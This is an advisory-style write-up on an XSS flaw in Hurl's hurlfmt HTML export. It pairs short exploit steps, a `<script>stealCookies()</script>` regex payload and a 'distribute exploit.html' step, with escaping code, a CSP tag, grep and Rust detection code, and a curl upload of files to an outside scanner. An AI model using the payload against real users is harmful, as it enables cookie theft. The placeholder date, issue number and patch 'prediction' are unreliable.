The vulnerability occurs when Hurl’s HTML export feature fails to properly escape regex literals containing malicious JavaScript payloads. When a user opens the exported HTML file, the embedded script executes automatically without sanitization. The `matches` assertion in Hurl files allows regex patterns, but the `hurlfmt` tool doesn’t encode HTML special characters like `<`, `>`, or quotes in the exported output. This leads to DOM-based XSS when the browser interprets the unescaped regex as executable HTML/JS.
DailyCVE Form
Platform: Hurl
Version: <4.2.0
Vulnerability: XSS
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch by Q1 2024
What Undercode Say:
Exploit:
1. Craft a Hurl file with a malicious regex (the regex must sit in an `[Asserts]` section for `hurlfmt` to parse the file):
```hurl
GET https://victim.com
HTTP 200
[Asserts]
jsonpath "$.body" matches /<script>stealCookies()</script>/
```
2. Export to HTML:
```bash
hurlfmt --out html payload.hurl > exploit.html
```
3. Distribute `exploit.html`; victim’s browser executes payload.
Protection:
1. Sanitize regex literals in `hurlfmt`:
```python
import html

escaped_regex = html.escape(regex_pattern)
```
2. Use CSP headers in exported HTML:
```html
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
```
3. Patch Hurl to encode special chars (`&` must be replaced first so the entities produced for `<` and `>` are not double-encoded):
```rust
fn escape_regex(input: &str) -> String {
    input
        .replace('&', "&amp;")
        .replace('<', "&lt;")
        .replace('>', "&gt;")
        .replace('"', "&quot;")
        .replace('\'', "&#x27;")
}
```
Detection:
```bash
grep -rn --include='*.hurl' 'matches /<script>' .
```
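As an added example (not Hurl’s or `hurlfmt`’s own code), the following Rust shows the unescaped export shape beside an escaped one that applies the fix from the Protection section, plus a scanner that implements the Detection check over Hurl source rather than a plain grep. Function names and the `<span class="regex">` markup are assumptions; the sample Hurl input is constructed.

```rust
/// Escape the characters that are significant in HTML text and attribute
/// context. `&` is handled first so entities produced later are not re-escaped.
pub fn html_escape(input: &str) -> String {
    let mut out = String::with_capacity(input.len() + 8);
    for c in input.chars() {
        match c {
            '&' => out.push_str("&amp;"),
            '<' => out.push_str("&lt;"),
            '>' => out.push_str("&gt;"),
            '"' => out.push_str("&quot;"),
            '\'' => out.push_str("&#x27;"),
            _ => out.push(c),
        }
    }
    out
}

/// Vulnerable export shape (assumed markup): the regex literal is interpolated
/// verbatim, so a `<script>` element inside the pattern becomes live markup.
pub fn render_regex_unescaped(regex: &str) -> String {
    format!("<span class=\"regex\">/{}/</span>", regex)
}

/// Hardened export: escape before interpolation; the browser shows the pattern
/// as text and never parses it as HTML.
pub fn render_regex_escaped(regex: &str) -> String {
    format!("<span class=\"regex\">/{}/</span>", html_escape(regex))
}

/// Detection: scan Hurl source for `matches /.../` literals that contain
/// HTML-significant characters. Returns (1-based line number, literal).
pub fn find_unsafe_regex_literals(hurl: &str) -> Vec<(usize, String)> {
    let mut hits = Vec::new();
    for (i, line) in hurl.lines().enumerate() {
        if let Some(start) = line.find("matches /") {
            let body = &line[start + "matches /".len()..];
            // The literal ends at the last '/' on the line (inner slashes are `\/`).
            if let Some(end) = body.rfind('/') {
                let lit = &body[..end];
                if lit.contains(|c| matches!(c, '<' | '>' | '"' | '\'' | '&')) {
                    hits.push((i + 1, lit.to_string()));
                }
            }
        }
    }
    hits
}
```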
Mitigation:
- Disable HTML export in CI/CD pipelines.
- Validate regex inputs before processing.
- Audit exported files with:
```bash
curl -X POST --data-binary @file.html https://xss-scanner.com/scan
```
References:
- OWASP XSS Cheat Sheet
- Hurl GitHub Issue XXX
Sources:
Reported By: github.com